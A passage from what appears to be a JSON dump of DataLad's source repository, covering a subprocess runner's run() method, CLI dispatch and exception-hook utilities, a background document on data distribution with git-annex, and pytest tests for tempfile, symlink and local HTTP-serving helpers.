be inherited. If `env` and `cwd` are given, 'PWD' in the\n environment is set to the string-value of `cwd`.\n \"\"\"\n self.env = env\n self.cwd = cwd\n\n def _get_adjusted_env(self,\n env: dict | None = None,\n cwd: str | PathLike | None = None,\n copy: bool = True\n ) -> dict | None:\n \"\"\"Return an adjusted execution environment\n\n This method adjusts the environment provided in `env` to\n reflect the configuration of the runner. It returns\n an altered copy or an altered original, if `copy` is\n `False`.\n\n Parameters\n ----------\n env\n The environment that should be adjusted\n\n cwd: str | PathLike | None (default: None)\n If not None, the content of this variable will be\n put into the environment variable 'PWD'.\n\n copy: bool (default: True)\n if True, the returned environment will be a\n copy of `env`. Else the passed in environment\n is modified. Note: if `env` is not `None` and\n `cwd` is `None` and `copy` is `True`, the\n returned dictionary is still a copy\n \"\"\"\n env = env.copy() if env is not None and copy is True else env\n if cwd is not None and env is not None:\n # If an environment and 'cwd' is provided, ensure the 'PWD' in the\n # environment is set to the value of 'cwd'.\n env['PWD'] = str(cwd)\n return env\n\n def run(self,\n cmd: list | str,\n protocol: type[WitlessProtocol] | None = None,\n stdin: bytes | IO | Queue | None = None,\n cwd: PathLike | str | None = None,\n env: dict | None = None,\n timeout: float | None = None,\n exception_on_error: bool = True,\n **kwargs) -> dict | _ResultGenerator:\n \"\"\"Execute a command and communicate with it.\n\n Parameters\n ----------\n cmd : list or str\n Sequence of program arguments. Passing a single string causes\n execution via the platform shell.\n protocol : WitlessProtocol, optional\n Protocol class handling interaction with the running process\n (e.g. output capture). A number of pre-crafted classes are\n provided (e.g `KillOutput`, `NoCapture`, `GitProgress`).\n If the protocol has the GeneratorMixIn-mixin, the run-method\n will return an iterator and can therefore be used in a for-clause.\n stdin : file-like, bytes, Queue, or None\n If stdin is a file-like, it will be directly used as stdin for the\n subprocess. The caller is responsible for writing to it and closing it.\n If stdin is a bytes, it will be fed to stdin of the subprocess.\n If all data is written, stdin will be closed.\n If stdin is a Queue, all elements (bytes) put into the Queue will\n be passed to stdin until None is read from the queue. If None is read,\n stdin of the subprocess is closed.\n cwd : str or path-like, optional\n If given, commands are executed with this path as PWD,\n the PWD of the parent process is used otherwise. Overrides\n any `cwd` given to the constructor.\n env : dict, optional\n Environment to be used for command execution. If given, it will\n completely replace any environment provided to theconstructor. If\n `cwd` is given, 'PWD' in the environment is set to its value.\n This must be a complete environment definition, no values\n from the current environment will be inherited. Overrides\n any `env` given to the constructor.\n timeout: float, optional\n None or the seconds after which a timeout callback is\n invoked, if no progress was made in communicating with\n the sub-process, or if waiting for the subprocess exit\n took more than the specified time. See the protocol and\n `ThreadedRunner` descriptions for a more detailed discussion\n on timeouts.\n exception_on_error : bool, optional\n This argument is first interpreted if the protocol is a subclass\n of `GeneratorMixIn`. If it is `True` (default), a\n `CommandErrorException` is raised by the generator if the\n sub process exited with a return code not equal to zero. If the\n parameter is `False`, no exception is raised. In both cases the\n return code can be read from the attribute `return_code` of\n the generator. Then this argument interpreted within this function\n to not raise `CommandError` if value is False in case of non-0 exit.\n kwargs :\n Passed to the Protocol class constructor.\n\n Returns\n -------\n dict | _ResultGenerator\n\n If the protocol is not a subclass of `GeneratorMixIn`, the\n result of protocol._prepare_result will be returned.\n\n If the protocol is a subclass of `GeneratorMixIn`, a Generator, i.e.\n a `_ResultGenerator`, will be returned. This allows to use this\n method in constructs like:\n\n for protocol_output in runner.run():\n ...\n\n Where the iterator yields whatever protocol.pipe_data_received\n sends into the generator.\n If all output was yielded and the process has terminated, the\n generator will raise StopIteration(return_code), where\n return_code is the return code of the process. The return code\n of the process will also be stored in the \"return_code\"-attribute\n of the runner. So you could write:\n\n gen = runner.run()\n for file_descriptor, data in gen:\n ...\n\n # get the return code of the process\n result = gen.return_code\n\n Raises\n ------\n CommandError\n On execution failure (non-zero exit code) this exception is\n raised which provides the command (cmd), stdout, stderr,\n exit code (status), and a message identifying the failed\n command, as properties.\n FileNotFoundError\n When a given executable does not exist.\n \"\"\"\n if protocol is None:\n # by default let all subprocess stream pass through\n protocol = NoCapture\n\n applied_cwd = cwd or self.cwd\n applied_env = self._get_adjusted_env(\n env=env or self.env,\n cwd=applied_cwd,\n )\n\n lgr.debug(\n 'Run %r (protocol_class=%s) (cwd=%s)',\n cmd,\n protocol.__name__,\n applied_cwd\n )\n\n threaded_runner = ThreadedRunner(\n cmd=cmd,\n protocol_class=protocol,\n stdin=stdin,\n protocol_kwargs=kwargs,\n timeout=timeout,\n exception_on_error=exception_on_error,\n cwd=applied_cwd,\n env=applied_env\n )\n\n results_or_iterator = threaded_runner.run()\n if issubclass(protocol, GeneratorMixIn):\n return results_or_iterator\n\n results = cast(dict, results_or_iterator)\n # log before any exception is raised\n lgr.debug(\"Finished %r with status %s\", cmd, results['code'])\n\n # make it such that we always blow if a protocol did not report\n # a return code at all or it was non-0 and we were not asked ignore\n # errors\n return_code = results.get('code', None)\n if return_code is None or (return_code and exception_on_error):\n # the runner has a better idea, doc string warns Protocol\n # implementations not to return these\n results.pop('cmd', None)\n results.pop('cwd', None)\n raise CommandError(\n # whatever the results were, we carry them forward\n cmd=cmd,\n cwd=applied_cwd,\n **results,\n )\n # Denoise result, the return code must be zero at this point.\n results.pop('code', None)\n return results\n" }, { "alpha_fraction": 0.6134969592094421, "alphanum_fraction": 0.6134969592094421, "avg_line_length": 29.5625, "blob_id": "8d69b675c562fb92d1af4016749617d1043bbe12", "content_id": "360dfcfeaa1a6f2c44296cf1a185ce9203c233f8", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 978, "license_type": "permissive", "max_line_length": 74, "num_lines": 32, "path": "/datalad/cli/utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "\"\"\"Central place to provide all utilities\"\"\"\n\nimport sys\n\nfrom datalad.log import is_interactive\n\n\n_sys_excepthook = sys.excepthook # Just in case we ever need original one\n\n\ndef setup_exceptionhook(ipython=False):\n \"\"\"Overloads default sys.excepthook with our exceptionhook handler.\n\n If interactive, our exceptionhook handler will invoke\n pdb.post_mortem; if not interactive, then invokes default handler.\n \"\"\"\n\n def _datalad_pdb_excepthook(type, value, tb):\n import traceback\n traceback.print_exception(type, value, tb)\n print()\n if is_interactive():\n import pdb\n pdb.post_mortem(tb)\n\n if ipython:\n from IPython.core import ultratb\n sys.excepthook = ultratb.FormattedTB(mode='Verbose',\n # color_scheme='Linux',\n call_pdb=is_interactive())\n else:\n sys.excepthook = _datalad_pdb_excepthook\n" }, { "alpha_fraction": 0.642636239528656, "alphanum_fraction": 0.642636239528656, "avg_line_length": 38.79999923706055, "blob_id": "dae9fa01bc1953942802fc83543b5f95ef1840a4", "content_id": "c966d3df69d967b0f48598f37253e42cce5a7374", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5174, "license_type": "permissive", "max_line_length": 78, "num_lines": 130, "path": "/datalad/cli/exec.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "\"\"\"Call a command interface\n\nProvide a callable to register in a cmdline parser, for executing\na parameterized command call.\n\"\"\"\n\n# ATTN!\n# Top-level inputs should be minimized. This module must be imported\n# for parser construction, but the key function call_from_parser()\n# is only executed when a command is actually engaged -- but not\n# for a help action.\n# Therefore no additional top-level imports beyond those already\n# caused unconditionally by .main, and .parser.\n\nfrom datalad import cfg\n\nfrom datalad.interface.base import (\n is_api_arg,\n)\nfrom datalad.utils import (\n getargspec,\n)\n\n# only imported during command execution\n# .interface._has_eval_results_call\n# from .utils import EnsureKeyChoice\n\n# special-case imports\n# .renderer.DefaultOutputRenderer\n# from datalad.ui import ui\n# from .exceptions import CapturedException\n\n\ndef call_from_parser(cls, args):\n \"\"\"Executable to be registered with the parser for a particular command\n\n Parameters\n ----------\n cls : Interface\n Class implementing a particular interface.\n args : Namespace\n Populated argparse namespace instance.\n\n Returns\n -------\n iterable\n Returns the iterable return by an command's implementation of\n ``__call__()``. It is unwound, in case of a generator being\n returned to actually trigger the underlying processing.\n \"\"\"\n # XXX needs safety check for name collisions\n import inspect\n from datalad.interface.base import _has_eval_results_call\n\n argspec = getargspec(cls.__call__, include_kwonlyargs=True)\n if argspec.keywords is None:\n # no **kwargs in the call receiver, pull argnames from signature\n argnames = argspec.args\n else:\n # common options\n # XXX define or better get from elsewhere\n # ultimately .common_args.common_args could be used, but\n # it is presently unclear what is being excluded here (incomplete set)\n common_opts = ('change_path', 'common_debug', 'common_idebug', 'func',\n 'help', 'log_level', 'logger',\n 'result_renderer', 'subparser')\n argnames = [name for name in dir(args)\n if not (name.startswith('_') or name in common_opts)]\n kwargs = {k: getattr(args, k)\n for k in argnames\n # some arguments might be Python-only and do not appear in the\n # parser Namespace\n if hasattr(args, k) and is_api_arg(k)}\n # we are coming from the entry point, this is the toplevel command,\n # let it run like generator so we can act on partial results quicker\n # TODO remove following condition test when transition is complete and\n # run indented code unconditionally\n if _has_eval_results_call(cls):\n # set all common args explicitly to override class defaults\n # that are tailored towards the the Python API\n kwargs['return_type'] = 'generator'\n kwargs['result_xfm'] = None\n if '{' in args.common_result_renderer:\n from .renderer import DefaultOutputRenderer\n # stupid hack, could and should become more powerful\n kwargs['result_renderer'] = DefaultOutputRenderer(\n args.common_result_renderer)\n else:\n # allow commands to override the default, unless something other\n # than the default 'tailored' is requested\n kwargs['result_renderer'] = \\\n args.common_result_renderer \\\n if args.common_result_renderer != 'tailored' \\\n else getattr(cls, 'result_renderer', 'generic')\n if args.common_on_failure:\n kwargs['on_failure'] = args.common_on_failure\n # compose filter function from to be invented cmdline options\n res_filter = _get_result_filter(args)\n if res_filter is not None:\n # Don't add result_filter if it's None because then\n # eval_results can't distinguish between --report-{status,type}\n # not specified via the CLI and None passed via the Python API.\n kwargs['result_filter'] = res_filter\n\n ret = cls.__call__(**kwargs)\n if inspect.isgenerator(ret):\n ret = list(ret)\n return ret\n\n\ndef _get_result_filter(args):\n from datalad.support.constraints import EnsureKeyChoice\n\n result_filter = None\n if args.common_report_status or 'datalad.runtime.report-status' in cfg:\n report_status = args.common_report_status or \\\n cfg.obtain('datalad.runtime.report-status')\n if report_status == \"all\":\n pass # no filter\n elif report_status == 'success':\n result_filter = EnsureKeyChoice('status', ('ok', 'notneeded'))\n elif report_status == 'failure':\n result_filter = EnsureKeyChoice('status',\n ('impossible', 'error'))\n else:\n result_filter = EnsureKeyChoice('status', (report_status,))\n if args.common_report_type:\n tfilt = EnsureKeyChoice('type', tuple(args.common_report_type))\n result_filter = result_filter & tfilt if result_filter else tfilt\n return result_filter\n" }, { "alpha_fraction": 0.5024077296257019, "alphanum_fraction": 0.5152487754821777, "avg_line_length": 35.64706039428711, "blob_id": "afddabac39eee808fc5a0a1a175c4d780562733b", "content_id": "2e49b836bc0faa8e10cb9d50343b8ac39af8cb0f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 623, "license_type": "permissive", "max_line_length": 87, "num_lines": 17, "path": "/datalad/cmdline/__init__.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"\n\"\"\"\n\nimport warnings\nwarnings.warn(\n \"All of datalad.cmdline is deprecated/discontinued as of datalad 0.16. \"\n \"A new CLI implementation is available at datalad.cli. \"\n \"Please adjust any imports.\",\n DeprecationWarning)\n" }, { "alpha_fraction": 0.8062942028045654, "alphanum_fraction": 0.8071356415748596, "avg_line_length": 55.590476989746094, "blob_id": "935c258b422d2fd4cff89917d9d03c3c51f59731", "content_id": "b03b772d104ced3659dbba468486be53ea59319a", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 5942, "license_type": "permissive", "max_line_length": 79, "num_lines": 105, "path": "/docs/source/background.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "Background and motivation\n*************************\n\nVision\n======\n\nData is at the core of science, and unobstructed access promotes scientific\ndiscovery through collaboration between data producers and consumers. The last\nyears have seen dramatic improvements in availability of data resources for\ncollaborative research, and new data providers are becoming available all the\ntime.\n\nHowever, despite the increased availability of data, their accessibility is far\nfrom being optimal. Potential consumers of these public datasets have to\nmanually browse various disconnected warehouses with heterogeneous interfaces.\nOnce obtained, data is disconnected from its origin and data versioning is\noften ad-hoc or completely absent. If data consumers can be reliably informed\nabout data updates at all, review of changes is difficult, and re-deployment is\ntedious and error-prone. This leads to wasteful friction caused by outdated or\nfaulty data.\n\nThe vision for this project is to transform the state of data-sharing and\ncollaborative work by providing uniform access to available datasets --\nindependent of hosting solutions or authentication schemes -- with reliable\nversioning and versatile deployment logistics. This is achieved by means of a\n:term:`dataset` handle, a lightweight representation of a dataset\nthat is capable of tracking the identity and location of a dataset's content as\nwell as carry meta-data. Together with associated software tools, scientists\nare able to obtain, use, extend, and share datasets (or parts thereof) in a\nway that is traceable back to the original data producer and is therefore\ncapable of establishing a strong connection between data consumers and the\nevolution of a dataset by future extension or error correction.\n\nMoreover, DataLad aims to provide all tools necessary to create and publish\n*data distributions* |---| an analog to software distributions or app-stores\nthat provide logistics middleware for software deployment. Scientific\ncommunities can use these tools to gather, curate, and make publicly available\nspecialized collections of datasets for specific research topics or data\nmodalities. All of this is possible by leveraging existing data sharing\nplatforms and institutional resources without the need for funding extra\ninfrastructure of duplicate storage. Specifically, this project aims to provide\na comprehensive, extensible data distribution for neuroscientific datasets that\nis kept up-to-date by an automated service.\n\n\nTechnological foundation: git-annex\n===================================\n\nThe outlined task is not unique to the problem of data-sharing in science.\nLogistical challenges such as delivering data, long-term storage and archiving,\nidentity tracking, and synchronization between multiple sites are rather\ncommon. Consequently, solutions have been developed in other contexts that can\nbe adapted to benefit scientific data-sharing.\n\nThe closest match is the software tool git-annex_. It combines the features of\nthe distributed version control system (dVCS) Git_ |---| a technology that has\nrevolutionized collaborative software development -- with versatile data access\nand delivery logistics. Git-annex was originally developed to address use cases\nsuch as managing a collection of family pictures at home. With git-annex, any\nfamily member can obtain an individual copy of such a picture library |---| the\n:term:`annex`. The annex in this example is essentially an image repository\nthat presents individual pictures to users as files in a single directory\nstructure, even though the actual image file contents may be distributed across\nmultiple locations, including a home-server, cloud-storage, or even off-line\nmedia such as external hard-drives.\n\nGit-annex provides functionality to obtain file contents upon request and can\nprompt users to make particular storage devices available when needed (e.g. a\nbackup hard-drive kept in a fire-proof compartment). Git-annex can also remove\nfiles from a local copy of that image repository, for example to free up space\non a laptop, while ensuring a configurable level of data redundancy across all\nknown storage locations. Lastly, git-annex is able to synchronize the content\nof multiple distributed copies of this image repository, for example in order\nto incorporate images added with the git-annex on the laptop of another family\nmember. It is important to note that git-annex is agnostic of the actual file\ntypes and is not limited to images.\n\nWe believe that the approach to data logistics taken by git-annex and the\nfunctionality it is currently providing are an ideal middleware for scientific\ndata-sharing. Its data repository model :term:`annex` readily provides the\nmajority of principal features needed for a dataset handle such as history\nrecording, identity tracking, and item-based resource locators. Consequently,\ninstead of a from-scratch development, required features, such as dedicated\nsupport for existing data-sharing portals and dataset meta-information, can be\nadded to a working solution that is already in production for several years.\nAs a result, DataLad focuses on the expansion of git-annex's functionality and\nthe development of tools that build atop Git and git-annex and enable the\ncreation, management, use, and publication of dataset handles and collections\nthereof.\n\nObjective\n=========\n\nBuilding atop git-annex, DataLad aims to provide a single, uniform interface to\naccess data from various data-sharing initiatives and data providers, and\nfunctionality to create, deliver, update, and share datasets for individuals\nand portal maintainers. As a command-line tool, it provides an abstraction\nlayer for the underlying Git-based middleware implementing the actual data\nlogistics, and serves as a foundation for other future user front-ends, such\nas a web-interface.\n\n.. |---| unicode:: U+02014 .. em dash\n\n.. _Git: https://git-scm.com\n.. _git-annex: http://git-annex.branchable.com\n" }, { "alpha_fraction": 0.6187578439712524, "alphanum_fraction": 0.6278162598609924, "avg_line_length": 30.154848098754883, "blob_id": "ddab966dc6868b185a0a9af00f1c30c8dd0b6b15", "content_id": "af234f7b8f2e8b03dbbf41cd42dc2bff4ddcc8ca", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21534, "license_type": "permissive", "max_line_length": 102, "num_lines": 691, "path": "/datalad/tests/test_tests_utils_pytest.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil; coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport base64\nimport logging\nimport os\nimport platform\nimport random\nimport sys\n\ntry:\n # optional direct dependency we might want to kick out\n import bs4\nexcept ImportError: # pragma: no cover\n bs4 = None\n\nfrom glob import glob\nfrom os.path import (\n basename,\n exists,\n)\nfrom os.path import join as opj\nfrom unittest.mock import patch\nfrom urllib.parse import quote as url_quote\nfrom urllib.request import (\n Request,\n urlopen,\n)\n\nimport pytest\nfrom _pytest.outcomes import (\n Failed,\n Skipped,\n)\n\nfrom datalad import cfg as dl_cfg\nfrom datalad.support import path as op\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.tests.utils_pytest import (\n OBSCURE_FILENAMES,\n OBSCURE_PREFIX,\n assert_cwd_unchanged,\n assert_dict_equal,\n assert_false,\n assert_in,\n assert_not_in,\n assert_raises,\n assert_re_in,\n assert_str_equal,\n assert_true,\n eq_,\n get_most_obscure_supported_name,\n ignore_nose_capturing_stdout,\n known_failure_githubci_win,\n known_failure_windows,\n local_testrepo_flavors,\n nok_startswith,\n ok_,\n ok_broken_symlink,\n ok_file_has_content,\n ok_file_under_git,\n ok_generator,\n ok_good_symlink,\n ok_startswith,\n ok_symlink,\n on_windows,\n patch_config,\n probe_known_failure,\n rmtemp,\n run_under_dir,\n serve_path_via_http,\n skip_if,\n skip_if_no_module,\n skip_if_no_network,\n skip_if_on_windows,\n skip_ssh,\n skip_wo_symlink_capability,\n swallow_logs,\n with_tempfile,\n with_testsui,\n with_tree,\n without_http_proxy,\n)\nfrom datalad.utils import (\n Path,\n chpwd,\n getpwd,\n)\n\n#\n# Test with_tempfile, especially nested invocations\n#\n\n@with_tempfile\ndef _with_tempfile_decorated_dummy(path):\n return path\n\n\ndef test_with_tempfile_dir_via_env_variable():\n target = os.path.join(os.path.expanduser(\"~\"), \"dataladtesttmpdir\")\n assert_false(os.path.exists(target), \"directory %s already exists.\" % target)\n\n with patch_config({'datalad.tests.temp.dir': target}):\n filename = _with_tempfile_decorated_dummy()\n ok_startswith(filename, target)\n\n@with_tempfile\n@with_tempfile\ndef test_nested_with_tempfile_basic(f1=None, f2=None):\n ok_(f1 != f2)\n ok_(not os.path.exists(f1))\n ok_(not os.path.exists(f2))\n\n\n# And the most obscure case to test. Generator for the test is\n# used as well to verify that every one of those functions adds new argument\n# to the end of incoming arguments.\n@with_tempfile(prefix=\"TEST\", suffix='big')\n@with_tree((('f1.txt', 'load'),))\n@with_tempfile(suffix='.cfg')\n@with_tempfile(suffix='.cfg.old')\ndef check_nested_with_tempfile_parametrized_surrounded(\n param, f0=None, tree=None, f1=None, f2=None, repo=None):\n eq_(param, \"param1\")\n ok_(f0.endswith('big'), msg=\"got %s\" % f0)\n ok_(os.path.basename(f0).startswith('TEST'), msg=\"got %s\" % f0)\n ok_(os.path.exists(os.path.join(tree, 'f1.txt')))\n ok_(f1 != f2)\n ok_(f1.endswith('.cfg'), msg=\"got %s\" % f1)\n ok_(f2.endswith('.cfg.old'), msg=\"got %s\" % f2)\n\n\n\ndef test_nested_with_tempfile_parametrized_surrounded():\n check_nested_with_tempfile_parametrized_surrounded(\"param1\")\n\n\n@with_tempfile(content=\"testtest\")\ndef test_with_tempfile_content(f=None):\n ok_file_has_content(f, \"testtest\")\n ok_file_has_content(f, \"test*\", re_=True)\n\n\ndef test_with_tempfile_content_raises_on_mkdir():\n\n @with_tempfile(content=\"test\", mkdir=True)\n def t(): # pragma: no cover\n raise AssertionError(\"must not be run\")\n\n with assert_raises(ValueError):\n # after this commit, it will check when invoking, not when decorating\n t()\n\n\ndef test_get_resolved_values():\n from datalad.tests.utils_pytest import _get_resolved_flavors\n flavors = ['networkish', 'local']\n eq_(([] if dl_cfg.get('datalad.tests.nonetwork') else ['networkish'])\n + ['local'],\n _get_resolved_flavors(flavors))\n\n with patch_config({'datalad.tests.nonetwork': '1'}):\n eq_(_get_resolved_flavors(flavors), ['local'])\n\ndef test_with_tempfile_mkdir():\n dnames = [] # just to store the name within the decorated function\n\n @with_tempfile(mkdir=True)\n def check_mkdir(d1):\n ok_(os.path.exists(d1))\n ok_(os.path.isdir(d1))\n dnames.append(d1)\n eq_(glob(os.path.join(d1, '*')), [])\n # Create a file to assure we can remove later the temporary load\n with open(os.path.join(d1, \"test.dat\"), \"w\") as f:\n f.write(\"TEST LOAD\")\n\n check_mkdir()\n if not dl_cfg.get('datalad.tests.temp.keep'):\n ok_(not os.path.exists(dnames[0])) # got removed\n\n\n@with_tempfile()\ndef test_with_tempfile_default_prefix(d1=None):\n d = basename(d1)\n short = 'datalad_temp_'\n full = short + \\\n 'test_with_tempfile_default_prefix'\n if on_windows:\n ok_startswith(d, short)\n nok_startswith(d, full)\n else:\n ok_startswith(d, full)\n\n\n@with_tempfile(prefix=\"nodatalad_\")\ndef test_with_tempfile_specified_prefix(d1=None):\n ok_startswith(basename(d1), 'nodatalad_')\n ok_('test_with_tempfile_specified_prefix' not in d1)\n\n\ndef test_get_most_obscure_supported_name():\n n = get_most_obscure_supported_name()\n ok_startswith(n, OBSCURE_PREFIX)\n ok_(len(OBSCURE_FILENAMES) > 1)\n # from more complex to simpler ones\n ok_(len(OBSCURE_FILENAMES[0]) > len(OBSCURE_FILENAMES[-1]))\n print(repr(n))\n\n\ndef test_keeptemp_via_env_variable():\n\n if dl_cfg.get('datalad.tests.temp.keep'): # pragma: no cover\n pytest.skip(\"We have env variable set to preserve tempfiles\")\n\n files = []\n\n @with_tempfile()\n def check(f):\n open(f, 'w').write(\"LOAD\")\n files.append(f)\n\n with patch.dict('os.environ', {}):\n check()\n\n with patch.dict('os.environ', {'DATALAD_TESTS_TEMP_KEEP': '1'}):\n check()\n\n eq_(len(files), 2)\n ok_(not exists(files[0]), msg=\"File %s still exists\" % files[0])\n ok_( exists(files[1]), msg=\"File %s not exists\" % files[1])\n\n rmtemp(files[-1])\n\n\n@skip_wo_symlink_capability\n@with_tempfile\ndef test_ok_symlink_helpers(tmpfile=None):\n\n assert_raises(AssertionError, ok_symlink, tmpfile)\n assert_raises(AssertionError, ok_good_symlink, tmpfile)\n assert_raises(AssertionError, ok_broken_symlink, tmpfile)\n\n tmpfile_symlink = tmpfile + '_symlink'\n Path(tmpfile_symlink).symlink_to(Path(tmpfile))\n\n # broken symlink\n ok_symlink(tmpfile_symlink)\n ok_broken_symlink(tmpfile_symlink)\n assert_raises(AssertionError, ok_good_symlink, tmpfile_symlink)\n\n with open(tmpfile, 'w') as tf:\n tf.write('test text')\n \n # tmpfile is still not a symlink here\n assert_raises(AssertionError, ok_symlink, tmpfile)\n assert_raises(AssertionError, ok_good_symlink, tmpfile)\n assert_raises(AssertionError, ok_broken_symlink, tmpfile)\n\n ok_symlink(tmpfile_symlink)\n ok_good_symlink(tmpfile_symlink)\n assert_raises(AssertionError, ok_broken_symlink, tmpfile_symlink)\n\n\ndef test_ok_startswith():\n ok_startswith('abc', 'abc')\n ok_startswith('abc', 'a')\n ok_startswith('abc', '')\n ok_startswith(' abc', ' ')\n ok_startswith('abc\\r\\n', 'a') # no effect from \\r\\n etc\n assert_raises(AssertionError, ok_startswith, 'abc', 'b')\n assert_raises(AssertionError, ok_startswith, 'abc', 'abcd')\n\n\ndef test_nok_startswith():\n nok_startswith('abc', 'bc')\n nok_startswith('abc', 'c')\n assert_raises(AssertionError, nok_startswith, 'abc', 'a')\n assert_raises(AssertionError, nok_startswith, 'abc', 'abc')\n\ndef test_ok_generator():\n def func(a, b=1):\n return a+b\n def gen(a, b=1): # pragma: no cover\n yield a+b\n # not sure how to determine if xrange is a generator\n assert_raises(AssertionError, ok_generator, range(2))\n assert_raises(AssertionError, ok_generator, gen)\n ok_generator(gen(1))\n assert_raises(AssertionError, ok_generator, func)\n assert_raises(AssertionError, ok_generator, func(1))\n\n\[email protected](\"func\", [os.chdir, chpwd])\ndef test_assert_Xwd_unchanged(func):\n orig_cwd = os.getcwd()\n orig_pwd = getpwd()\n\n @assert_cwd_unchanged\n def do_chdir():\n func(os.pardir)\n\n with assert_raises(AssertionError) as cm:\n do_chdir()\n\n eq_(orig_cwd, os.getcwd(),\n \"assert_cwd_unchanged didn't return us back to cwd %s\" % orig_cwd)\n eq_(orig_pwd, getpwd(),\n \"assert_cwd_unchanged didn't return us back to pwd %s\" % orig_pwd)\n\[email protected](\"func\", [os.chdir, chpwd])\ndef test_assert_Xwd_unchanged_ok_chdir(func):\n # Test that we are not masking out other \"more important\" exceptions\n\n orig_cwd = os.getcwd()\n orig_pwd = getpwd()\n\n @assert_cwd_unchanged(ok_to_chdir=True)\n def do_chdir_value_error():\n func(os.pardir)\n return \"a value\"\n\n with swallow_logs() as cml:\n eq_(do_chdir_value_error(), \"a value\")\n eq_(orig_cwd, os.getcwd(),\n \"assert_cwd_unchanged didn't return us back to cwd %s\" % orig_cwd)\n eq_(orig_pwd, getpwd(),\n \"assert_cwd_unchanged didn't return us back to cwd %s\" % orig_pwd)\n assert_not_in(\"Mitigating and changing back\", cml.out)\n\n\ndef test_assert_cwd_unchanged_not_masking_exceptions():\n # Test that we are not masking out other \"more important\" exceptions\n\n orig_cwd = os.getcwd()\n\n @assert_cwd_unchanged\n def do_chdir_value_error():\n os.chdir(os.pardir)\n raise ValueError(\"error exception\")\n\n with swallow_logs(new_level=logging.WARN) as cml:\n with assert_raises(ValueError) as cm:\n do_chdir_value_error()\n # retrospect exception\n eq_(orig_cwd, os.getcwd(),\n \"assert_cwd_unchanged didn't return us back to %s\" % orig_cwd)\n assert_in(\"Mitigating and changing back\", cml.out)\n\n # and again but allowing to chdir\n @assert_cwd_unchanged(ok_to_chdir=True)\n def do_chdir_value_error():\n os.chdir(os.pardir)\n raise ValueError(\"error exception\")\n\n with swallow_logs(new_level=logging.WARN) as cml:\n assert_raises(ValueError, do_chdir_value_error)\n eq_(orig_cwd, os.getcwd(),\n \"assert_cwd_unchanged didn't return us back to %s\" % orig_cwd)\n assert_not_in(\"Mitigating and changing back\", cml.out)\n\n\n@with_tempfile(mkdir=True)\ndef _test_serve_path_via_http(test_fpath, use_ssl, auth, tmp_dir): # pragma: no cover\n tmp_dir = Path(tmp_dir)\n test_fpath = Path(test_fpath)\n # First verify that filesystem layer can encode this filename\n # verify first that we could encode file name in this environment\n try:\n filesysencoding = sys.getfilesystemencoding()\n test_fpath_encoded = str(test_fpath.as_posix()).encode(filesysencoding)\n except UnicodeEncodeError: # pragma: no cover\n pytest.skip(\"Environment doesn't support unicode filenames\")\n if test_fpath_encoded.decode(filesysencoding) != test_fpath.as_posix(): # pragma: no cover\n pytest.skip(\"Can't convert back/forth using %s encoding\"\n % filesysencoding)\n\n test_fpath_full = tmp_dir / test_fpath\n test_fpath_full.parent.mkdir(parents=True, exist_ok=True)\n test_fpath_full.write_text(\n f'some txt and a randint {random.randint(1, 10)}')\n\n @serve_path_via_http(tmp_dir, use_ssl=use_ssl, auth=auth)\n def test_path_and_url(path, url):\n def _urlopen(url, auth=None):\n req = Request(url)\n if auth:\n req.add_header(\n \"Authorization\",\n b\"Basic \" + base64.standard_b64encode(\n '{0}:{1}'.format(*auth).encode('utf-8')))\n return urlopen(req)\n\n # @serve_ should remove http_proxy from the os.environ if was present\n if not on_windows:\n assert_false('http_proxy' in os.environ)\n # get the \"dir-view\"\n dirurl = url + test_fpath.parent.as_posix()\n u = _urlopen(dirurl, auth)\n assert_true(u.getcode() == 200)\n html = u.read()\n # get the actual content\n file_html = _urlopen(\n url + url_quote(test_fpath.as_posix()), auth).read().decode()\n # verify we got the right one\n eq_(file_html, test_fpath_full.read_text())\n\n if bs4 is None:\n return\n\n # MIH is not sure what this part below is supposed to do\n # possibly some kind of internal consistency test\n soup = bs4.BeautifulSoup(html, \"html.parser\")\n href_links = [txt.get('href') for txt in soup.find_all('a')]\n assert_true(len(href_links) == 1)\n parsed_url = f\"{dirurl}/{href_links[0]}\"\n u = _urlopen(parsed_url, auth)\n html = u.read().decode()\n eq_(html, file_html)\n\n test_path_and_url()\n\n\[email protected](\"test_fpath\", [\n 'test1.txt',\n Path('test_dir', 'test2.txt'),\n Path('test_dir', 'd2', 'd3', 'test3.txt'),\n 'file with space test4',\n u'Джэйсон',\n get_most_obscure_supported_name(),\n])\[email protected](\"use_ssl,auth\", [\n (False, None),\n (True, None),\n (False, ('ernie', 'bert')),\n])\ndef test_serve_path_via_http(test_fpath, use_ssl, auth):\n _test_serve_path_via_http(test_fpath, use_ssl, auth)\n\n\ndef test_serve_path_via_http_local_proxy():\n # just with the last one check that we did remove proxy setting\n with patch.dict('os.environ', {'http_proxy': 'http://127.0.0.1:9/'}):\n _test_serve_path_via_http(get_most_obscure_supported_name(), False, 